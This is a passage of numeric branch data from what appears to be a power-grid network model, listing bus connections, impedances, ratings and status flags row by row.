1, -360, 158.686 ], [341, 292, 0, 0.0009329409048961218, 0.07535316024134399, 2567.0, 2567.0, 2567.0, 0, 1, 1, -360, 8.083 ], [557, 342, 0, 0.006019834710743802, 0.0636843933534336, 991.0, 991.0, 991.0, 0, 2, 1, -360, 18.21 ], [558, 343, 0, 0.010650247933884296, 0.11266996708783199, 991.0, 991.0, 991.0, 0, 1, 1, -360, 32.217 ], [502, 340, 0, 0.021737520661157025, 0.22996326026071198, 991.0, 991.0, 991.0, 0, 2, 1, -360, 65.756 ], [72, 32, 0, 0.00675502077562327, 0.969954803293024, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 78.03399999999999 ], [344, 345, 0, 0.0005762927054480609, 0.04654686738645321, 2567.0, 2567.0, 2567.0, 0, 1, 1, -360, 4.993 ], [346, 47, 0, 0.0011340027700831024, 0.04070792194158799, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 6.55 ], [46, 47, 0, 0.0008975069252077563, 0.0322183003580208, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 5.184 ], [346, 345, 0, 0.0007217797783933517, 0.025910126194627202, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 4.169 ], [347, 328, 0, 0.029905454545454544, 0.07909314882361201, 495.0, 495.0, 495.0, 0, 1, 1, -360, 45.232 ], [347, 348, 0, 0.04883438016528925, 0.129155866607944, 495.0, 495.0, 495.0, 0, 1, 1, -360, 73.862 ], [571, 348, 0, 0.041548429752066116, 0.10988617921762801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 62.842 ], [347, 572, 0, 0.016052231404958678, 0.04245451362512801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 24.279 ], [571, 570, 0, 0.17379041322314048, 0.11490906279551602, 248.0, 248.0, 248.0, 0, 1, 1, -360, 131.429 ], [14, 350, 0, 0.02166743801652892, 0.05730546235524, 495.0, 495.0, 495.0, 0, 1, 1, -360, 32.772 ], [350, 573, 0, 0.026277685950413226, 0.06949852316919598, 495.0, 495.0, 495.0, 0, 1, 1, -360, 39.745 ], [15, 351, 0, 0.02639265927977839, 0.236857956201204, 856.0, 856.0, 856.0, 0, 1, 1, -360, 76.222 ], [352, 15, 0, 0.0015260560941828254, 0.219126704094076, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 17.629 ], [15, 335, 0, 0.0035338758079432133, 1.1417173740880242, 5134.0, 5134.0, 5134.0, 0, 1, 1, -360, 61.235 ], [232, 227, 0, 5.5747922437673134e-05, 0.000500303468136644, 1200.0, 1200.0, 1200.0, 0, 1, 1, -360, 0.161 ], [565, 544, 0, 0.0394803305785124, 0.10441652566461601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 59.714 ], [235, 567, 0, 0.02391404958677686, 0.25298896294275997, 991.0, 991.0, 991.0, 0, 1, 1, -360, 72.34 ], [567, 286, 0, 0.008068760330578512, 0.34144067500694797, 1981.0, 1981.0, 1981.0, 0, 1, 1, -360, 48.816 ], [353, 519, 0, 0.007621818181818182, 0.080631926038356, 991.0, 991.0, 991.0, 0, 1, 1, -360, 23.055999999999997 ], [354, 353, 0, 0.0008436363636363636, 0.00892490784392768, 991.0, 991.0, 991.0, 0, 2, 1, -360, 2.552 ], [355, 354, 0, 0.0068502479338842966, 0.0181173530898976, 495.0, 495.0, 495.0, 0, 1, 1, -360, 10.360999999999999 ], [354, 356, 0, 0.01855404958677686, 0.049071255647172, 495.0, 495.0, 495.0, 0, 1, 1, -360, 28.063000000000002 ], [357, 358, 0, 0.0034823407202216067, 0.5000300103406239, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 40.228 ], [574, 359, 0, 0.013352066115702478, 0.0353131884615884, 495.0, 495.0, 495.0, 0, 1, 1, -360, 20.195 ], [235, 575, 0, 0.007459504132231404, 0.0789147905557, 991.0, 991.0, 991.0, 0, 1, 1, -360, 22.565 ], [167, 361, 0, 0.000616198347107438, 0.0065188198358579995, 991.0, 991.0, 991.0, 0, 1, 1, -360, 1.864 ], [528, 362, 0, 0.0011960330578512398, 0.012652945368078402, 991.0, 991.0, 991.0, 0, 1, 1, -360, 3.6180000000000003 ], [363, 344, 0, 0.0002662742382271468, 0.009558592968871479, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.538 ], [259, 364, 0, 0.013069713758102496, 0.26390852570525997, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 56.618 ], [54, 56, 0, 0.007723337950138504, 0.0693122289241068, 856.0, 856.0, 856.0, 0, 1, 1, -360, 22.305 ], [365, 364, 0, 0.0049974607571537395, 0.10091058802821559, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 21.649 ], [231, 366, 0, 0.0013273891966759002, 0.0476500209962672, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 7.667000000000001 ], [30, 367, 0, 0.01126108033240997, 0.1010613005635992, 856.0, 856.0, 856.0, 0, 1, 1, -360, 32.522 ], [61, 367, 0, 0.020337603878116343, 0.18251754162067196, 856.0, 856.0, 856.0, 0, 1, 1, -360, 58.735 ], [254, 368, 0, 0.0004297520661157025, 0.00454638722456732, 991.0, 991.0, 991.0, 0, 1, 1, -360, 1.3 ], [254, 369, 0, 0.00015999999999999999, 0.00169265493591832, 991.0, 991.0, 991.0, 0, 2, 1, -360, 0.484 ], [254, 370, 0, 0.0003669421487603306, 0.0038819152455960805, 991.0, 991.0, 991.0, 0, 2, 1, -360, 1.11 ], [99, 358, 0, 0.0020184383656509696, 0.28982797432374396, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 23.316999999999997 ], [354, 519, 0, 0.006762644628099174, 0.07154264880985199, 991.0, 991.0, 991.0, 0, 1, 1, -360, 20.457 ], [571, 371, 0, 0.023726942148760328, 0.06275238397221199, 495.0, 495.0, 495.0, 0, 1, 1, -360, 35.887 ], [207, 372, 0, 0.002329256198347108, 0.006160354689297601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 3.523 ], [57, 373, 0, 0.0017725619834710745, 0.0046880246727212796, 495.0, 495.0, 495.0, 0, 1, 1, -360, 2.681 ], [209, 374, 0, 0.0010122922437673131, 0.0363388121515216, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 5.847 ], [375, 376, 0, 0.0045364727608518006, 0.0916021467933684, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 19.652 ], [376, 377, 0, 0.0030886426592797783, 0.062367022394423606, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 13.38 ], [16, 49, 0, 0.002266101108033241, 0.32538991773524, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 26.178 ], [318, 377, 0, 0.004755078485685596, 0.0960163149704152, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 20.599 ], [378, 297, 0, 0.01753917355371901, 0.046387138574374404, 495.0, 495.0, 495.0, 0, 1, 1, -360, 26.528000000000002 ], [562, 379, 0, 0.01802314049586777, 0.047667121439141605, 495.0, 495.0, 495.0, 0, 1, 1, -360, 27.26 ], [576, 563, 0, 0.001808264462809917, 0.004782449638150801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 2.735 ], [576, 381, 0, 0.0034320661157024794, 0.009077036954898, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.191 ], [577, 576, 0, 0.06004495867768594, 0.15880530575430396, 495.0, 495.0, 495.0, 0, 1, 1, -360, 90.818 ], [244, 383, 0, 0.006845567867036011, 0.1382282547912684, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 29.655 ], [244, 306, 0, 0.02679108956599723, 0.5409756541164079, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 116.059 ], [383, 306, 0, 0.0300685595567867, 0.269846910348376, 856.0, 856.0, 856.0, 0, 1, 1, -360, 86.838 ], [380, 306, 0, 0.00025605955678670365, 0.03676764369572, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 2.958 ], [252, 225, 0, 0.062094545454545444, 0.041056499553586, 248.0, 248.0, 248.0, 0, 1, 1, -360, 46.958999999999996 ], [220, 76, 0, 0.002772074099722992, 0.398042682239984, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 32.023 ], [542, 384, 0, 0.007939834710743802, 0.020999063146094, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.009 ], [385, 384, 0, 0.053734876033057856, 0.035529141854791196, 248.0, 248.0, 248.0, 0, 1, 1, -360, 40.637 ], [542, 385, 0, 0.011306115702479337, 0.119608453436296, 991.0, 991.0, 991.0, 0, 2, 1, -360, 34.201 ], [386, 385, 0, 0.003668760330578512, 0.0388121580140316, 991.0, 991.0, 991.0, 0, 1, 1, -360, 11.097999999999999 ], [387, 578, 0, 0.015444628099173553, 0.16339016240905604, 991.0, 991.0, 991.0, 0, 1, 1, -360, 46.72 ], [332, 388, 0, 0.014036184210526315, 0.5038646344377999, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 81.07300000000001 ], [382, 332, 0, 0.017764369806094183, 0.637697365901468, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 102.60700000000001 ], [382, 388, 0, 0.00476159972299169, 0.17092976750548, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 27.503 ], [579, 578, 0, 0.01911074380165289, 0.050543585664, 495.0, 495.0, 495.0, 0, 1, 1, -360, 28.905 ], [577, 387, 0, 0.07597818181818182, 0.20094506949431204, 495.0, 495.0, 495.0, 0, 1, 1, -360, 114.917 ], [144, 390, 0, 0.0004277685950413223, 0.0011313509747276, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.647 ], [37, 49, 0, 0.008441481994459835, 0.303028527944352, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 48.758 ], [391, 233, 0, 0.014211218836565096, 0.1275369872004348, 856.0, 856.0, 856.0, 0, 1, 1, -360, 41.042 ], [392, 310, 0, 0.007035318559556785, 0.06313767618386361, 856.0, 856.0, 856.0, 0, 1, 1, -360, 20.317999999999998 ], [260, 393, 0, 0.006341412742382271, 0.0569102963692744, 856.0, 856.0, 856.0, 0, 1, 1, -360, 18.314 ], [394, 230, 0, 0.0007590027700831025, 0.00681158510656168, 856.0, 856.0, 856.0, 0, 1, 1, -360, 2.1919999999999997 ], [395, 282, 0, 0.008762984764542936, 0.314569689934484, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 50.615 ], [395, 244, 0, 0.0034046052631578946, 0.12221699007344, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 19.665 ], [25, 396, 0, 0.008809037396121884, 0.316222866612064, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 50.881 ], [81, 74, 0, 0.0075207756232686974, 0.26997742429652244, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 43.44 ], [278, 80, 0, 0.016286011080332407, 0.5846279085788, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 94.068 ], [81, 278, 0, 0.021054016620498613, 0.755787629231688, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 121.60799999999999 ], [569, 570, 0, 0.03253950413223141, 0.08605961294018, 495.0, 495.0, 495.0, 0, 1, 1, -360, 49.216 ], [397, 552, 0, 0.006289586776859504, 0.0166345314104904, 1200.0, 1200.0, 1200.0, 0, 1, 1, -360, 9.513 ], [542, 398, 0, 0.0005580165289256199, 0.0059033089500572, 991.0, 991.0, 991.0, 0, 1, 1, -360, 1.6880000000000002 ], [398, 385, 0, 0.021893553719008262, 0.05790348713648401, 495.0, 495.0, 495.0, 0, 1, 1, -360, 33.114000000000004 ], [399, 499, 0, 0.03266380165289256, 0.021597087927192803, 248.0, 248.0, 248.0, 0, 1, 1, -360, 24.701999999999998 ], [83, 399, 0, 0.025700495867768593, 0.016992996557050798, 248.0, 248.0, 248.0, 0, 1, 1, -360, 19.436 ], [498, 400, 0, 0.012134214876033058, 0.032092247974028, 495.0, 495.0, 495.0, 0, 1, 1, -360, 18.352999999999998 ], [518, 239, 0, 0.04685289256198347, 0.123915281026504, 495.0, 495.0, 495.0, 0, 1, 1, -360, 70.865 ], [575, 543, 0, 0.0030307438016528923, 0.032062521596058796, 991.0, 991.0, 991.0, 0, 1, 1, -360, 9.168 ], [401, 360, 0, 0.007957063711911357, 0.071409774520472, 856.0, 856.0, 856.0, 0, 1, 1, -360, 22.98 ], [580, 581, 0, 0.007134545454545454, 0.018869255592422397, 495.0, 495.0, 495.0, 0, 1, 1, -360, 10.790999999999999 ], [401, 402, 0, 0.0033434903047091418, 0.030005778188384805, 856.0, 856.0, 856.0, 0, 1, 1, -360, 9.656 ], [403, 231, 0, 0.009592105263157893, 0.08608327126915, 856.0, 856.0, 856.0, 0, 1, 1, -360, 27.701999999999998 ], [189, 360, 0, 0.028456024930747923, 0.255375399471348, 856.0, 856.0, 856.0, 0, 1, 1, -360, 82.181 ], [234, 404, 0, 0.008092561983471074, 0.0214029921648796, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.24 ], [235, 404, 0, 0.05107504132231405, 0.13508190749437998, 495.0, 495.0, 495.0, 0, 1, 1, -360, 77.251 ], [235, 580, 0, 0.000580495867768595, 0.00153527999352772, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.878 ], [216, 259, 0, 0.0022115650969529088, 0.079389770210892, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 12.774000000000001 ], [405, 259, 0, 0.0052832409972299165, 0.1896554115982928, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 30.516 ], [405, 318, 0, 0.0066348684210526315, 0.23817552558268398, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 38.323 ], [406, 230, 0, 8.098164819944598e-05, 0.046512685161986804, 6845.0, 6845.0, 6845.0, 0, 1, 1, -360, 1.871 ], [542, 407, 0, 0.025569586776859506, 0.067625761355152, 495.0, 495.0, 495.0, 0, 1, 1, -360, 38.674 ], [23, 408, 0, 0.03224528925619835, 0.08528148128033601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 48.771 ], [577, 348, 0, 0.012999008264462809, 0.13751772188026398, 991.0, 991.0, 991.0, 0, 2, 1, -360, 39.321999999999996 ], [562, 564, 0, 0.06921520661157024, 0.18305853298686803, 495.0, 495.0, 495.0, 0, 1, 1, -360, 104.68799999999999 ], [582, 507, 0, 0.006357685950413223, 0.016814638289042002, 495.0, 495.0, 495.0, 0, 1, 1, -360, 9.616 ], [27, 410, 0, 0.0030042975206611565, 0.007945685980170399, 495.0, 495.0, 495.0, 0, 1, 1, -360, 4.544 ], [501, 27, 0, 0.003811570247933884, 0.040322957460962, 991.0, 991.0, 991.0, 0, 1, 1, -360, 11.53 ], [27, 411, 0, 0.004648595041322314, 0.012294480221518, 495.0, 495.0, 495.0, 0, 1, 1, -360, 7.031000000000001 ], [411, 410, 0, 0.002054214876033058, 0.0054329327333556, 495.0, 495.0, 495.0, 0, 1, 1, -360, 3.1069999999999998 ], [403, 360, 0, 0.008191481994459833, 0.07351353506655639, 856.0, 856.0, 856.0, 0, 1, 1, -360, 23.656999999999996 ], [412, 360, 0, 0.016761772853185596, 0.15042664773666, 856.0, 856.0, 856.0, 0, 1, 1, -360, 48.408 ], [326, 413, 0, 0.012077024793388432, 0.12776397267356798, 991.0, 991.0, 991.0, 0, 2, 1, -360, 36.533 ], [414, 413, 0, 0.008093223140495867, 0.08561896310149601, 991.0, 991.0, 991.0, 0, 2, 1, -360, 24.482 ], [6, 297, 0, 0.019472396694214876, 0.0128750188978664, 248.0, 248.0, 248.0, 0, 1, 1, -360, 14.725999999999999 ], [554, 580, 0, 0.07435371900826447, 0.196648733567264, 495.0, 495.0, 495.0, 0, 1, 1, -360, 112.46 ], [262, 401, 0, 0.03931232686980609, 0.35280406181043206, 856.0, 856.0, 856.0, 0, 1, 1, -360, 113.53399999999999 ], [499, 556, 0, 0.04185586776859504, 0.11069928308639199, 495.0, 495.0, 495.0, 0, 2, 1, -360, 63.306999999999995 ], [224, 229, 0, 0.004135206611570248, 0.0437467367631624, 991.0, 991.0, 991.0, 0, 1, 1, -360, 12.509 ], [583, 507, 0, 0.024632727272727268, 0.065147980317596, 495.0, 495.0, 495.0, 0, 1, 1, -360, 37.257 ], [415, 307, 0, 0.015675554016620498, 0.1406784987952448, 856.0, 856.0, 856.0, 0, 1, 1, -360, 45.271 ], [416, 507, 0, 0.0010555371900826446, 0.011166626467730801, 991.0, 991.0, 991.0, 0, 1, 1, -360, 3.193 ], [284, 561, 0, 0.015221487603305786, 0.16102953827307598, 991.0, 991.0, 991.0, 0, 1, 1, -360, 46.045 ], [543, 417, 0, 0.0006614876033057851, 0.027991756419545603, 1981.0, 1981.0, 1981.0, 0, 4, 1, -360, 4.002 ], [418, 506, 0, 0.0009395041322314049, 0.009939101917118, 991.0, 991.0, 991.0, 0, 1, 1, -360, 2.842 ], [220, 157, 0, 0.004599549861495845, 0.165112574384632, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 26.566999999999997 ], [295, 419, 0, 0.0012023140495867769, 0.012719392565946, 991.0, 991.0, 991.0, 0, 1, 1, -360, 3.637 ], [295, 420, 0, 0.0008003305785123967, 0.008466771900532, 991.0, 991.0, 991.0, 0, 1, 1, -360, 2.421 ], [541, 62, 0, 0.05133355371900827, 0.0339414035471236, 248.0, 248.0, 248.0, 0, 1, 1, -360, 38.821 ], [52, 421, 0, 0.00013885041551246538, 0.004984389831631239, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.802 ], [60, 160, 0, 6.128808864265928e-05, 0.000550023067454096, 856.0, 856.0, 856.0, 0, 2, 1, -360, 0.177 ], [535, 161, 0, 3.735537190082645e-05, 0.00039518596644331203, 991.0, 991.0, 991.0, 0, 2, 1, -360, 0.113 ], [267, 282, 0, 0.0065652700831024926, 0.235677115717012, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 37.921 ], [52, 365, 0, 0.007655586334279779, 0.15458444922992, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 33.164 ], [28, 27, 0, 0.015726942148760328, 0.041594197273402404, 495.0, 495.0, 495.0, 0, 1, 1, -360, 23.787 ], [30, 201, 0, 0.009128289473684211, 0.327683234253536, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 52.725 ], [422, 81, 0, 0.0004226685133887349, 0.13655487952674, 5134.0, 5134.0, 5134.0, 0, 6, 1, -360, 7.324 ], [119, 425, 0, 0.003579120498614958, 0.1284816595874996, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 20.673000000000002 ], [423, 425, 0, 0.0006518351800554017, 0.0233992864289392, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 3.765 ], [424, 425, 0, 0.005922957063711911, 0.21261965153389198, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 34.211 ], [426, 428, 0, 0.013948429752066116, 0.14756174042535197, 991.0, 991.0, 991.0, 0, 2, 1, -360, 42.193999999999996 ], [427, 428, 0, 0.0002664462809917355, 0.0028187600792304794, 991.0, 991.0, 991.0, 0, 2, 1, -360, 0.8059999999999999 ], [19, 428, 0, 0.023607603305785128, 0.24974703912892798, 991.0, 991.0, 991.0, 0, 2, 1, -360, 71.413 ], [45, 429, 0, 0.02562314049586777, 0.067767398802972, 495.0, 495.0, 495.0, 0, 1, 1, -360, 38.755 ], [44, 429, 0, 5.289256198347107e-05, 0.00013988883767892, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.08 ], [505, 429, 0, 0.006012561983471073, 0.015901863623161996, 495.0, 495.0, 495.0, 0, 1, 1, -360, 9.094 ], [231, 431, 0, 0.011677285318559558, 0.4191859418495199, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 67.44800000000001 ], [190, 431, 0, 0.009600761772853185, 0.34464383257266795, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 55.45399999999999 ], [430, 431, 0, 0.0028100761772853187, 0.1008748520662472, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.230999999999998 ], [286, 433, 0, 0.01568694214876033, 0.16595362535967603, 991.0, 991.0, 991.0, 0, 1, 1, -360, 47.453 ], [432, 433, 0, 0.00010049586776859504, 0.00106315516636076, 991.0, 991.0, 991.0, 0, 1, 1, -360, 0.304 ], [506, 433, 0, 0.0065904132231404955, 0.06972059669946801, 991.0, 991.0, 991.0, 0, 1, 1, -360, 19.936 ], [23, 434, 0, 0.02613685950413223, 0.069126069139116, 495.0, 495.0, 495.0, 0, 2, 1, -360, 39.532 ], [400, 434, 0, 0.008155371900826446, 0.021569110159669603, 495.0, 495.0, 495.0, 0, 2, 1, -360, 12.335 ], [500, 434, 0, 0.006338512396694216, 0.0167639285853336, 495.0, 495.0, 495.0, 0, 2, 1, -360, 9.587 ], [32, 436, 0, 0.0044813019390581715, 0.16086776359270402, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 25.884 ], [435, 436, 0, 0.0006634349030470914, 0.023815688073266, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 3.832 ], [78, 436, 0, 0.00897680055401662, 0.32224515307884394, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 51.85 ], [86, 438, 0, 0.014693213296398892, 0.52745036936438, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 84.868 ], [437, 438, 0, 1.0387811634349031e-05, 0.0003728969948845, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.06 ], [221, 438, 0, 0.002280124653739612, 0.081850890377238, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.17 ], [207, 439, 0, 0.055703801652892564, 0.0368309823503996, 248.0, 248.0, 248.0, 0, 1, 1, -360, 42.126000000000005 ], [516, 439, 0, 0.05448462809917355, 0.03602487292327441, 248.0, 248.0, 248.0, 0, 1, 1, -360, 41.20399999999999 ], [513, 439, 0, 0.046726611570247926, 0.0308953241066316, 248.0, 248.0, 248.0, 0, 1, 1, -360, 35.336999999999996 ], [181, 441, 0, 0.040805289256198356, 0.10792074104825197, 495.0, 495.0, 495.0, 0, 1, 1, -360, 61.718 ], [440, 441, 0, 0.0001322314049586777, 0.000349722094197784, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.2 ], [504, 441, 0, 0.05916099173553719, 0.156467413554364, 495.0, 495.0, 495.0, 0, 1, 1, -360, 89.48100000000001 ], [135, 442, 0, 0.004956890581717451, 0.177940231009092, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 28.631 ], [109, 442, 0, 0.0015380886426592797, 0.055213615042649204, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 8.884 ], [112, 442, 0, 0.0027304362880886425, 0.09801597510545401, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 15.770999999999999 ], [113, 443, 0, 0.0019885734072022164, 0.07138491472072879, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 11.485999999999999 ], [132, 443, 0, 0.006788434903047091, 0.24368818615747198, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 39.21 ], [107, 443, 0, 2.2333795013850418e-05, 0.000801728539002036, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.129 ], [444, 445, 0, 7.877423822714682e-05, 0.00282780221121528, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.455 ], [112, 445, 0, 0.002816135734072022, 0.101092375313206, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.266 ], [109, 445, 0, 0.0014354224376731304, 0.0515281497432104, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 8.291 ], [119, 447, 0, 0.005212690443213296, 0.74849127803204, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 60.217 ], [100, 447, 0, 0.0050695117728531865, 0.7279322237145921, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 58.563 ], [446, 447, 0, 2.9518698060941832e-05, 0.00423859584186224, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 0.341 ], [124, 448, 0, 6.509695290858726e-05, 0.00233682116794768, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.376 ], [125, 448, 0, 0.00615148891966759, 0.22082338542026803, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 35.531 ], [131, 448, 0, 3.912742382271468e-05, 0.0014045786807313759, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.226 ], [449, 450, 0, 0.0023614958448753462, 0.08477191683710039, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.64 ], [173, 450, 0, 0.002862361495844876, 0.10275176694050518, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.533 ], [184, 450, 0, 0.004022853185595568, 0.14441057621844403, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 23.236 ], [144, 451, 0, 0.007672727272727273, 0.020292624515794402, 495.0, 495.0, 495.0, 0, 1, 1, -360, 11.605 ], [140, 451, 0, 0.006991074380165291, 0.018489807120219602, 495.0, 495.0, 495.0, 0, 1, 1, -360, 10.574000000000002 ], [514, 451, 0, 0.01149289256198347, 0.030396095817207994, 495.0, 495.0, 495.0, 0, 1, 1, -360, 17.383 ], [537, 585, 0, 0.05072595041322314, 0.134158641165824, 495.0, 495.0, 495.0, 0, 1, 1, -360, 76.723 ], [141, 585, 0, 0.007994710743801653, 0.0211441978151932, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.092 ], [584, 585, 0, 9.256198347107438e-05, 0.000244805465938352, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.14 ], [522, 454, 0, 0.0035008264462809916, 0.0092588924438956, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.295 ], [144, 454, 0, 0.00452892561983471, 0.011977981726290799, 495.0, 495.0, 495.0, 0, 1, 1, -360, 6.85 ], [453, 454, 0, 0.001114710743801653, 0.0029481572540882, 495.0, 495.0, 495.0, 0, 1, 1, -360, 1.686 ], [199, 456, 0, 0.013063140495867768, 0.0086372614214612, 248.0, 248.0, 248.0, 0, 1, 1, -360, 9.879 ], [140, 456, 0, 0.005061818181818182, 0.013387361765852802, 495.0, 495.0, 495.0, 0, 2, 1, -360, 7.656000000000001 ], [455, 456, 0, 0.0011365289256198346, 0.00300586139962416, 495.0, 495.0, 495.0, 0, 2, 1, -360, 1.719 ], [537, 456, 0, 0.039058512396694216, 0.025825228046024003, 248.0, 248.0, 248.0, 0, 1, 1, -360, 29.538 ], [538, 457, 0, 0.027927272727272728, 0.0184653265736368, 248.0, 248.0, 248.0, 0, 1, 1, -360, 21.12 ], [153, 457, 0, 0.030093223140495867, 0.019897438549384, 248.0, 248.0, 248.0, 0, 1, 1, -360, 22.758000000000003 ], [176, 457, 0, 0.004579173553719009, 0.0030277190305137603, 248.0, 248.0, 248.0, 0, 1, 1, -360, 3.463 ], [524, 459, 0, 0.004318677685950414, 0.011421923596476799, 495.0, 495.0, 495.0, 0, 1, 1, -360, 6.532 ], [458, 459, 0, 0.001993388429752066, 0.0052720605700488, 495.0, 495.0, 495.0, 0, 1, 1, -360, 3.015 ], [134, 459, 0, 0.011813553719008265, 0.031244171895617998, 495.0, 495.0, 495.0, 0, 1, 1, -360, 17.868 ], [460, 461, 0, 6.611570247933885e-05, 0.000174861047098892, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.1 ], [150, 461, 0, 0.008018512396694214, 0.021207147792120403, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.128 ], [149, 461, 0, 0.005586115702479339, 0.0147740098693748, 495.0, 495.0, 495.0, 0, 1, 1, -360, 8.449 ], [521, 463, 0, 0.014348429752066114, 0.009487086110365599, 248.0, 248.0, 248.0, 0, 1, 1, -360, 10.850999999999999 ], [462, 463, 0, 0.007197355371900825, 0.0047588433967958406, 248.0, 248.0, 248.0, 0, 1, 1, -360, 5.443 ], [538, 463, 0, 0.012211570247933883, 0.0080742088497664, 248.0, 248.0, 248.0, 0, 1, 1, -360, 9.235 ], [110, 464, 0, 0.0025753116343490306, 0.0924473799817492, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 14.875 ], [90, 464, 0, 0.007328947368421053, 0.26309125979076, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 42.332 ], [165, 464, 0, 0.002152527700831025, 0.0772704722900764, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 12.433 ], [458, 465, 0, 0.002003305785123967, 0.0052982897270776, 495.0, 495.0, 495.0, 0, 1, 1, -360, 3.03 ], [134, 465, 0, 0.011838677685950413, 0.031310619093534, 495.0, 495.0, 495.0, 0, 1, 1, -360, 17.906 ], [524, 465, 0, 0.004293553719008264, 0.0113554763986092, 495.0, 495.0, 495.0, 0, 1, 1, -360, 6.494 ], [466, 467, 0, 0.0023509349030470914, 0.084392804892244, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.579 ], [110, 467, 0, 0.0025337603878116343, 0.09095579200221118, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 14.635 ], [165, 467, 0, 0.0022891274238227145, 0.08217406777274441, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.222000000000001 ], [468, 469, 0, 0.0005269421487603305, 0.0013936425453786, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.797 ], [541, 469, 0, 0.022390743801652895, 0.05921844221026801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 33.866 ], [490, 469, 0, 0.028243305785123966, 0.07469714209944801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 42.718 ], [263, 471, 0, 0.0371900826446281, 0.0245898347482832, 248.0, 248.0, 248.0, 0, 1, 1, -360, 28.125 ], [470, 471, 0, 0.001570909090909091, 0.0010386746197682802, 248.0, 248.0, 248.0, 0, 1, 1, -360, 1.188 ], [534, 471, 0, 0.024497190082644622, 0.0161973787927468, 248.0, 248.0, 248.0, 0, 1, 1, -360, 18.526 ], [136, 472, 0, 